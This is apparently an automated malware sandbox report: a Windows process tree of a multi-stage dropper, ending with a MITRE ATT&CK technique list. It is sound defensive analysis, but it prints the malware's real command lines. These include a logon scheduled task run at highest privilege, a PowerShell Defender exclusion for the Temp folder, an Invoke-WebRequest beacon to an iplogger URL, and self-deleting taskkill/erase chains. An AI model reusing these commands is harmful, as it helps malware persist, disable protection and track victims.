schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
6⤵
- Creates scheduled task(s)
PID:2636

C:\Users\Admin\Documents\HC3gz_1wlBVdWAoPpHLvLRkX.exe
"C:\Users\Admin\Documents\HC3gz_1wlBVdWAoPpHLvLRkX.exe"
5⤵
PID:3396

C:\Users\Admin\Documents\hwoDpM4sfdcxq2zodSwNKf0h.exe
"C:\Users\Admin\Documents\hwoDpM4sfdcxq2zodSwNKf0h.exe"
5⤵
PID:1532

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "hwoDpM4sfdcxq2zodSwNKf0h.exe" /f & erase "C:\Users\Admin\Documents\hwoDpM4sfdcxq2zodSwNKf0h.exe" & exit
6⤵
PID:1096

C:\Users\Admin\Documents\MpSzwQ4jHhJuKaaKXgWymG3e.exe
"C:\Users\Admin\Documents\MpSzwQ4jHhJuKaaKXgWymG3e.exe"
5⤵
PID:3724

C:\Windows\SysWOW64\cmd.exe
"cmd" /c start "" "210921.exe" & start "" "Done.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1aX5d7"
6⤵
PID:2172

C:\Users\Admin\Documents\kiuhvWtUZig13s1czHy90Rl9.exe
"C:\Users\Admin\Documents\kiuhvWtUZig13s1czHy90Rl9.exe"
5⤵
PID:3520

C:\Users\Admin\Documents\hPD5MOePidu5wasrGUsMcIlx.exe
"C:\Users\Admin\Documents\hPD5MOePidu5wasrGUsMcIlx.exe"
5⤵
PID:2264

C:\Users\Admin\Documents\7R6XF3uBM9y_UPeutPhPA5Ik.exe
"C:\Users\Admin\Documents\7R6XF3uBM9y_UPeutPhPA5Ik.exe"
5⤵
- Executes dropped EXE
PID:472

C:\Users\Admin\Documents\7R6XF3uBM9y_UPeutPhPA5Ik.exe
"C:\Users\Admin\Documents\7R6XF3uBM9y_UPeutPhPA5Ik.exe"
6⤵
PID:1048

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 472 -s 712
6⤵
- Program crash
PID:2848

C:\Users\Admin\Documents\AZzSCYJmc7g_b1Ack7OZG0sH.exe
"C:\Users\Admin\Documents\AZzSCYJmc7g_b1Ack7OZG0sH.exe"
5⤵
PID:3796

C:\Users\Admin\Documents\AZzSCYJmc7g_b1Ack7OZG0sH.exe
"C:\Users\Admin\Documents\AZzSCYJmc7g_b1Ack7OZG0sH.exe"
6⤵
PID:2856

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3796 -s 712
6⤵
- Program crash
PID:1700

C:\Users\Admin\Documents\DtZpccCgXvbQm4z_eCgetYKf.exe
"C:\Users\Admin\Documents\DtZpccCgXvbQm4z_eCgetYKf.exe"
5⤵
PID:1968

C:\Users\Admin\AppData\Local\Temp\7zSA16C.tmp\Install.exe
.\Install.exe
6⤵
PID:2744

C:\Users\Admin\AppData\Local\Temp\7zSAB1D.tmp\Install.exe
.\Install.exe /S /site_id "394347"
7⤵
PID:568

C:\Users\Admin\Documents\EF5JBp1ZAVm3YWJmrBHZbadi.exe
"C:\Users\Admin\Documents\EF5JBp1ZAVm3YWJmrBHZbadi.exe"
5⤵
PID:3096

C:\Users\Admin\Documents\csPbkNrhos5kdQ9OHbz0C1U9.exe
"C:\Users\Admin\Documents\csPbkNrhos5kdQ9OHbz0C1U9.exe"
5⤵
PID:3144

C:\Users\Admin\Documents\44m2eF95SPc0JHjNfsMulHha.exe
"C:\Users\Admin\Documents\44m2eF95SPc0JHjNfsMulHha.exe"
5⤵
PID:3184

C:\Users\Admin\Documents\uy4N1bDmmvIU251YyPjsLK9t.exe
"C:\Users\Admin\Documents\uy4N1bDmmvIU251YyPjsLK9t.exe"
5⤵
PID:2052

C:\Users\Admin\Documents\Oz7jxi1P4RCXI3EABY1DGq4w.exe
"C:\Users\Admin\Documents\Oz7jxi1P4RCXI3EABY1DGq4w.exe"
5⤵
PID:3768

C:\Users\Admin\Documents\35jUiD1rpna3AqJrRDOiiWrh.exe
"C:\Users\Admin\Documents\35jUiD1rpna3AqJrRDOiiWrh.exe"
5⤵
PID:3448

C:\Users\Admin\Documents\lTYY_cb58zbymeJMo2JuXdVu.exe
"C:\Users\Admin\Documents\lTYY_cb58zbymeJMo2JuXdVu.exe"
5⤵
PID:3676

C:\Users\Admin\Documents\QS4UQNzsadlMdUixOaNZ1Gu7.exe
"C:\Users\Admin\Documents\QS4UQNzsadlMdUixOaNZ1Gu7.exe"
5⤵
PID:2480

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon114596ddbd42f8.exe
3⤵
- Loads dropped DLL
PID:1264

C:\Users\Admin\AppData\Local\Temp\7zS8C476BB2\Mon114596ddbd42f8.exe
Mon114596ddbd42f8.exe
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:584

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon1164bf13c51f2c.exe
3⤵
- Loads dropped DLL
PID:2032

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon112a4b301b.exe
3⤵
- Loads dropped DLL
PID:1116

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon11a9944c09b.exe
3⤵
- Loads dropped DLL
PID:840

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon1103cf83aaf9.exe
3⤵
- Loads dropped DLL
PID:1472

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon11a554223654cac.exe
3⤵
- Loads dropped DLL
PID:656

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon11c20bd59014d.exe /mixone
3⤵
- Loads dropped DLL
PID:576

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon11bddd2ee4744bdc.exe
3⤵
- Loads dropped DLL
PID:472

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon11cce54fe7cc83fa3.exe
3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:592

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
3⤵
- Suspicious use of WriteProcessMemory
PID:1220

C:\Users\Admin\AppData\Local\Temp\7zS8C476BB2\Mon1103cf83aaf9.exe
Mon1103cf83aaf9.exe
1⤵
- Executes dropped EXE
PID:1088

C:\Users\Admin\AppData\Local\Temp\7zS8C476BB2\Mon11c20bd59014d.exe
Mon11c20bd59014d.exe /mixone
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1892

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{YLDU-WBnPq-IuKE-DgD7R}\55823358473.exe"
2⤵
PID:3376

C:\Users\Admin\AppData\Local\Temp\{YLDU-WBnPq-IuKE-DgD7R}\55823358473.exe
"C:\Users\Admin\AppData\Local\Temp\{YLDU-WBnPq-IuKE-DgD7R}\55823358473.exe"
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3504

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{YLDU-WBnPq-IuKE-DgD7R}\93276853163.exe" /mix
2⤵
PID:3668

C:\Users\Admin\AppData\Local\Temp\{YLDU-WBnPq-IuKE-DgD7R}\93276853163.exe
"C:\Users\Admin\AppData\Local\Temp\{YLDU-WBnPq-IuKE-DgD7R}\93276853163.exe" /mix
3⤵
- Executes dropped EXE
PID:3884

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{YLDU-WBnPq-IuKE-DgD7R}\63854431107.exe" /mix
2⤵
PID:3832

C:\Users\Admin\AppData\Local\Temp\{YLDU-WBnPq-IuKE-DgD7R}\63854431107.exe
"C:\Users\Admin\AppData\Local\Temp\{YLDU-WBnPq-IuKE-DgD7R}\63854431107.exe" /mix
3⤵
- Executes dropped EXE
PID:2044

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe"
2⤵
PID:304

C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe
"C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2980

C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe
"C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe"
4⤵
- Executes dropped EXE
PID:3736

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "Mon11c20bd59014d.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS8C476BB2\Mon11c20bd59014d.exe" & exit
2⤵
PID:3952

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "Mon11c20bd59014d.exe" /f
3⤵
- Kills process with taskkill
PID:3820

C:\Users\Admin\AppData\Local\Temp\7zS8C476BB2\Mon11bddd2ee4744bdc.exe
Mon11bddd2ee4744bdc.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:1008

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
2⤵
PID:2348

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2412

C:\Users\Admin\AppData\Local\Temp\7zS8C476BB2\Mon112a4b301b.exe
Mon112a4b301b.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1780

C:\Users\Admin\AppData\Local\Temp\is-7DE2E.tmp\Mon112a4b301b.tmp
"C:\Users\Admin\AppData\Local\Temp\is-7DE2E.tmp\Mon112a4b301b.tmp" /SL5="$110150,247014,163328,C:\Users\Admin\AppData\Local\Temp\7zS8C476BB2\Mon112a4b301b.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1188

C:\Users\Admin\AppData\Local\Temp\is-02COU.tmp\Ze2ro.exe
"C:\Users\Admin\AppData\Local\Temp\is-02COU.tmp\Ze2ro.exe" /S /UID=burnerch2
3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
PID:2456

C:\Program Files\Windows Mail\ZFVTEFOJVN\ultramediaburner.exe
"C:\Program Files\Windows Mail\ZFVTEFOJVN\ultramediaburner.exe" /VERYSILENT
4⤵
- Executes dropped EXE
PID:4036

C:\Users\Admin\AppData\Local\Temp\is-245VK.tmp\ultramediaburner.tmp
"C:\Users\Admin\AppData\Local\Temp\is-245VK.tmp\ultramediaburner.tmp" /SL5="$20312,281924,62464,C:\Program Files\Windows Mail\ZFVTEFOJVN\ultramediaburner.exe" /VERYSILENT
5⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:2028

C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
6⤵
- Executes dropped EXE
PID:2988

C:\Users\Admin\AppData\Local\Temp\b3-921ab-003-cd694-841e1445ac47a\SHaebaelaevoqy.exe
"C:\Users\Admin\AppData\Local\Temp\b3-921ab-003-cd694-841e1445ac47a\SHaebaelaevoqy.exe"
4⤵
- Executes dropped EXE
PID:3996

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
5⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:3596

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3596 CREDAT:275457 /prefetch:2
6⤵
- Modifies Internet Explorer settings
PID:4032

C:\Users\Admin\AppData\Local\Temp\18-4e2b4-fc6-a9ba6-b8076f6de67dc\Tolydumala.exe
"C:\Users\Admin\AppData\Local\Temp\18-4e2b4-fc6-a9ba6-b8076f6de67dc\Tolydumala.exe"
4⤵
- Executes dropped EXE
PID:2348

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5meofrws.oxe\GcleanerEU.exe /eufive & exit
5⤵
PID:2160

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lsb5i1vb.she\installer.exe /qn CAMPAIGN="654" & exit
5⤵
PID:2112

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cganlyqy.qec\anyname.exe & exit
5⤵
PID:3152

C:\Users\Admin\AppData\Local\Temp\cganlyqy.qec\anyname.exe
C:\Users\Admin\AppData\Local\Temp\cganlyqy.qec\anyname.exe
6⤵
PID:2364

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jk30o2dq.g2f\gcleaner.exe /mixfive & exit
5⤵
PID:4060

C:\Users\Admin\AppData\Local\Temp\jk30o2dq.g2f\gcleaner.exe
C:\Users\Admin\AppData\Local\Temp\jk30o2dq.g2f\gcleaner.exe /mixfive
6⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1776

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\354qmsyb.ynr\autosubplayer.exe /S & exit
5⤵
PID:3132

C:\Users\Admin\AppData\Local\Temp\354qmsyb.ynr\autosubplayer.exe
C:\Users\Admin\AppData\Local\Temp\354qmsyb.ynr\autosubplayer.exe /S
6⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3868

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsm7B68.tmp\tempfile.ps1"
7⤵
PID:2536

C:\Users\Admin\AppData\Local\Temp\7zS8C476BB2\Mon11a9944c09b.exe
Mon11a9944c09b.exe
1⤵
- Executes dropped EXE
PID:1624

C:\Users\Admin\AppData\Local\Temp\7zS8C476BB2\Mon1164bf13c51f2c.exe
Mon1164bf13c51f2c.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1392

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1392 -s 972
2⤵
- Loads dropped DLL
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2380

C:\Users\Admin\AppData\Local\Temp\7zS8C476BB2\Mon11a554223654cac.exe
Mon11a554223654cac.exe
1⤵
- Executes dropped EXE
PID:852

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1844

C:\Users\Admin\AppData\Local\Temp\7zS8C476BB2\Mon11cce54fe7cc83fa3.exe
Mon11cce54fe7cc83fa3.exe
1⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:1692

C:\Users\Admin\AppData\Roaming\1133274.scr
"C:\Users\Admin\AppData\Roaming\1133274.scr" /S
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2396

C:\Users\Admin\AppData\Roaming\7771480.scr
"C:\Users\Admin\AppData\Roaming\7771480.scr" /S
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2548

C:\Users\Admin\AppData\Roaming\6496633.scr
"C:\Users\Admin\AppData\Roaming\6496633.scr" /S
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2952

C:\Users\Admin\AppData\Roaming\3467698.scr
"C:\Users\Admin\AppData\Roaming\3467698.scr" /S
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:3004

C:\Users\Admin\AppData\Roaming\3467698.scr
"C:\Users\Admin\AppData\Roaming\3467698.scr"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1220

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3004 -s 712
3⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:1696

C:\Users\Admin\AppData\Roaming\7741122.scr
"C:\Users\Admin\AppData\Roaming\7741122.scr" /S
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:2124

C:\Users\Admin\AppData\Roaming\7058254.scr
"C:\Users\Admin\AppData\Roaming\7058254.scr" /S
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2620

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:4000

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
2⤵
PID:4028

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

Disabling Security Tools

T1089

Virtualization/Sandbox Evasion

T1497

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Software Discovery

T1518

Query Registry

Virtualization/Sandbox Evasion

T1497

System Information Discovery